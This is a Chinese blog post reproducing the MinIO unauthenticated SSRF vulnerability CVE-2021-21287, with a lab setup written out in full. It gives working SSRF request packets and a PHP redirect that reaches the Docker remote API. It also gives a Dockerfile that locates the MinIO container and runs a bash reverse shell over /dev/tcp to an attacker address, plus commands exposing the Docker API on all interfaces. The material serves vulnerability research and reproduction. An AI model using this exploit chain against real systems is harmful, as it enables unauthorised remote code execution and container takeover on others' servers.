MinIO未授权SSRF漏洞(CVE-2021-21287)

  • A+
所属分类:安全漏洞

MinIO未授权SSRF漏洞(CVE-2021-21287)

MinIO未授权SSRF漏洞(CVE-2021-21287)


一、漏洞简介


由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞

攻击者可以通过构造URL来发起服务器端请求伪造攻击成功利用此漏洞的攻击者能够通过利用服务器上的功能来读取、更新内部资源或执行任意命令

该漏洞无需用户验证即可远程利用


二、影响版本


MinIO < RELEASE.2021-01-30T00-20-58Z


三、环境准备&漏洞复现

Docker 安装 minio

docker-compose.yml

version: '3.7'services:  minio1:    image: minio/minio:RELEASE.2021-01-16T02-19-44Z    volumes:      - data1-1:/data1      - data1-2:/data2    ports:      - "9000:9000"    environment:      MINIO_ACCESS_KEY: minio      MINIO_SECRET_KEY: minio123    command: server http://minio{1...4}/data{1...2}    healthcheck:      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]      interval: 30s      timeout: 20s      retries: 3

## By default this config uses default local driver,## For custom volumes replace with volume driver configuration.volumes: data1-1: data1-2:

启动环境:

MinIO未授权SSRF漏洞(CVE-2021-21287)

首页样式:

http://192.168.1.108:9000/minio/login

MinIO未授权SSRF漏洞(CVE-2021-21287)

1、验证SSRF

MinIO未授权SSRF漏洞(CVE-2021-21287)

具体数据包:

POST /minio/webrpc HTTP/1.1Host: 192.168.1.104:1234User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Type: application/jsonConnection: closeContent-Length: 79
{"id":1,"jsonrpc":"2.0","params":{"token": "test"},"method":"web.LoginSTS"}

2、ssrf反弹shell

web服务下面放文件:index.php(apache)

<?phpheader('Location: http://192.168.1.108:2375/build?remote=http://192.168.1.104/Dockerfile&nocache=true&t=evil:1', false, 307);

反弹shell文件:

DockerFile如下

FROM alpine:3.13
RUN apk add curl bash jq
RUN set -ex && { echo '#!/bin/bash'; echo 'set -ex'; echo 'target="http://192.168.1.108:2375"'; echo 'jsons=$(curl -s -XGET "${target}/containers/json" | jq -r ".[] | @base64")'; echo 'for item in ${jsons[@]}; do'; echo ' name=$(echo $item | base64 -d | jq -r ".Image")'; echo ' if [[ "$name" == *"minio/minio"* ]]; then'; echo ' id=$(echo $item | base64 -d | jq -r ".Id")'; echo ' break'; echo ' fi'; echo 'done'; echo 'execid=$(curl -s -X POST "${target}/containers/${id}/exec" -H "Content-Type: application/json" --data-binary "{"Cmd": ["bash", "-c", "bash -i >& /dev/tcp/192.168.1.104/888 0>&1"]}" | jq -r ".Id")'; echo 'curl -s -X POST "${target}/exec/${execid}/start" -H "Content-Type: application/json" --data-binary "{}"'; } | bash

具体操作数据包:

POST /minio/webrpc HTTP/1.1Host: 192.168.1.104User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Type: application/jsonConnection: closeContent-Length: 79
{"id":1,"jsonrpc":"2.0","params":{"token": "test"},"method":"web.LoginSTS"}

为了好的展示录了一个小视频。

过程枯燥等待较长:加了一个BGM






注意⚠️:

因为自己Docker API已开启,过程未写入其中。

开启Docker API参考:

打开配置文件找到ExecStart=/usr/bin/dockerd 
修改为ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock重启
$ systemctl daemon-reload$ systemctl restart docker

MinIO未授权SSRF漏洞(CVE-2021-21287)




过程中还是很多坑需要去爬😂😂😂(多次尝试未果,最后成功,部分细节未记录丢失了)

时间匆忙有些粗糙望见谅🙏



SSRF-poc:

POST /minio/webrpc HTTP/1.1Host: 监听地址User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Type: application/jsonConnection: closeContent-Length: 79

{"id":1,"jsonrpc":"2.0","params":{"token": "test"},"method":"web.LoginSTS"}


参考:

https://mp.weixin.qq.com/s/X04IhY9Oau-kDOVbok8wEw

https://www.o2oxy.cn/3104.html

https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html



免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。


订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

MinIO未授权SSRF漏洞(CVE-2021-21287)

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

MinIO未授权SSRF漏洞(CVE-2021-21287)

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

MinIO未授权SSRF漏洞(CVE-2021-21287)

本文始发于微信公众号(thelostworld):MinIO未授权SSRF漏洞(CVE-2021-21287)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: